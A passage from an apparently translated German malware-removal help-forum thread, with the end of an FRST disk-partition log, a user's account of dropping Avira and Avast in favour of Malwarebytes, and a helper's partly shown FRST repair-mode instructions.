Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: A7927814)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=913.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=17.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=102 MB) - (Type=0C)

========================================================
Disk: 1 (Size: 30 GB) (Disk ID: 00000000)
Partition: GPT.

==================== Ende von Addition.txt ============================
[/CODE]

Maybe one more thing about why I don't have an AV: I had Avira for years, until I realized it is totally blind. It never reported anything except cookies, and it certainly never cleaned anything up. Malwarebytes always found and removed those things successfully. Then I had Avast for a while (1+ years), but that was only marginally better than Avira. It rarely reported anything. If it found anything at all, MB always found more. So I got rid of Avast too.

I looked through Addition.txt a bit; not that I understand any of it, but there apparently are problems with some 'security updates'. I can see something similar under Windows Updates on the laptop: several 'security essentials' updates failed there. But when I google the error messages (code), I only get 'misspelled' or 'check your spelling'.
04.10.2017, 15:52 | #15 | |
/// TB-Ausbilder | Anti-malware programs no longer start

Servus, OK, well done... even though you ran FRST not in repair mode (as requested) but only in safe mode with command prompt... well, it apparently worked there too...

Now we will do a fix with FRST in repair mode... as far as I'm concerned again in safe mode with command prompt, if that works... I leave that up to you.

Quote:

For the following FRST fix, however, you must replace these 'xxxxxx' yourself with the correct user name, otherwise the fix will not work.

Step 1

Step 2
Now please try to copy FRST to the desktop in normal mode and start FRST there again as follows:

With your next reply, please post